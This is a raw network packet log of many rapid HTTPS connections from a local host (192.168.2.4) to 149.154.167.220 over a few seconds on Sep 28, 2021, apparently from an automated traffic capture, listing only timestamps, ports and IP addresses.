Sep 28, 2021 07:58:34.518573046 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.518578053 CEST	443	49833	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.657607079 CEST	443	49833	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.657680035 CEST	443	49833	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.657762051 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.659130096 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.660662889 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.660692930 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.660779953 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.661190033 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.661200047 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.716594934 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.719708920 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.719726086 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.719878912 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.719885111 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.834886074 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.834976912 CEST	443	49834	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.838382959 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.838429928 CEST	49834	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.839380980 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.839432001 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.840554953 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.844713926 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.844749928 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.901333094 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.905867100 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.905919075 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.906824112 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.906857967 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.027169943 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.027261019 CEST	443	49835	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.027333021 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.035659075 CEST	49835	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.041081905 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.041147947 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.045866013 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.045965910 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.045978069 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.109662056 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.115401030 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.115437984 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.115654945 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.115669966 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.233866930 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.233954906 CEST	443	49836	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.234029055 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.235358000 CEST	49836	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.237498045 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.237529993 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.237664938 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.238286018 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.238316059 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.295402050 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.299308062 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.299344063 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.299499989 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.299514055 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.398355961 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.398448944 CEST	443	49837	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.398634911 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.400613070 CEST	49837	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.412034988 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.412086010 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.414510012 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.414556980 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.414570093 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.474647999 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.479017973 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.479054928 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.479237080 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.479262114 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.584877968 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.584973097 CEST	443	49838	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.585585117 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.588253021 CEST	49838	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.588855982 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.588917971 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.589209080 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.589740038 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.589764118 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.655572891 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.660151005 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.660181999 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.660360098 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.660372019 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.794722080 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.794815063 CEST	443	49839	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.795341015 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.796176910 CEST	49839	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.798228025 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.798279047 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.798372030 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.799192905 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.799232006 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.856808901 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.861763954 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.861789942 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.862198114 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.862212896 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.968858004 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.968943119 CEST	443	49840	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.969008923 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.970170021 CEST	49840	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.972930908 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.972989082 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:35.973195076 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.974639893 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:35.974668980 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.033658028 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.037261009 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.037296057 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.037408113 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.037425041 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.118457079 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.118582010 CEST	443	49841	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.118794918 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.119806051 CEST	49841	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.121397972 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.121437073 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.121556044 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.122040987 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.122061968 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.180613041 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.185735941 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.185759068 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.186026096 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.186034918 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.282612085 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.282706976 CEST	443	49842	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.282767057 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.283705950 CEST	49842	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.285065889 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.285128117 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.285221100 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.285794020 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.285824060 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.343532085 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.346716881 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.346752882 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.346867085 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.346882105 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.472821951 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.472922087 CEST	443	49843	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.472990990 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.474293947 CEST	49843	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.476114988 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.476151943 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.476223946 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.476948023 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.476967096 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.534370899 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.537918091 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.537976027 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.538065910 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.538089991 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.632360935 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.632455111 CEST	443	49844	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.632507086 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.633519888 CEST	49844	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.635365009 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.635423899 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.635529041 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.636105061 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.636132002 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.694782972 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.697369099 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.697413921 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.697488070 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.697499037 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.798372030 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.798491001 CEST	443	49845	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.798691034 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.799751043 CEST	49845	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.801917076 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.801955938 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.802068949 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.802541018 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.802561998 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.860320091 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.864540100 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.864578009 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.864720106 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.864732027 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.954859972 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.954960108 CEST	443	49846	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.955094099 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.956326008 CEST	49846	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.957874060 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.957905054 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:36.958693027 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.958738089 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:36.958745956 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.015773058 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.021924019 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.021953106 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.022638083 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.022650003 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.127791882 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.127923965 CEST	443	49847	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.128904104 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.129518032 CEST	49847	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.131344080 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.131433010 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.132308006 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.135946989 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.136002064 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.210211039 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.251804113 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.252260923 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.252269983 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.254935026 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.254945040 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.406779051 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.406851053 CEST	443	49848	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.407007933 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.407957077 CEST	49848	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.410356045 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.410418034 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.410537004 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.411147118 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.411178112 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.468168974 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.471028090 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.471062899 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.474572897 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.474617958 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.576570988 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.576656103 CEST	443	49849	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.576834917 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.577708006 CEST	49849	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.579396963 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.579437971 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.580591917 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.581096888 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.581123114 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.644664049 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.648017883 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.648056030 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.648159027 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.648169994 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.736907959 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.736999989 CEST	443	49850	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.737070084 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.738238096 CEST	49850	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.740215063 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.740252972 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.740367889 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.740910053 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.740925074 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.797158003 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.800910950 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.800929070 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.801068068 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.801073074 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.901613951 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.901705027 CEST	443	49851	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.903912067 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.904488087 CEST	49851	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.905889988 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.905922890 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.906006098 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.906378031 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.906394005 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.962579966 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.966267109 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.966293097 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:37.966456890 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:37.966465950 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.070353031 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.070456028 CEST	443	49852	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.070979118 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.073919058 CEST	49852	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.076518059 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.076564074 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.078250885 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.083681107 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.083703995 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.143902063 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.148503065 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.148525953 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.155180931 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.155195951 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.324174881 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.324671030 CEST	443	49853	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.326852083 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.326895952 CEST	49853	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.327955008 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.328011990 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.328444004 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.329193115 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.329210997 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.390535116 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.395077944 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.395128012 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.395258904 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.395272970 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.502652884 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.502742052 CEST	443	49854	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.502825975 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.504235029 CEST	49854	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.506072998 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.506197929 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.506371021 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.507165909 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.507198095 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.563916922 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.567941904 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.568003893 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.568172932 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.568191051 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.684956074 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.685079098 CEST	443	49855	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.685180902 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.686350107 CEST	49855	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.688261032 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.688296080 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.688419104 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.689093113 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.689106941 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.745847940 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.750117064 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.750150919 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.750286102 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.750302076 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.860172987 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.860268116 CEST	443	49856	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.861521959 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.861754894 CEST	49856	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.863991976 CEST	49857	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.864034891 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.864157915 CEST	49857	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.864784002 CEST	49857	443	192.168.2.4	149.154.167.220
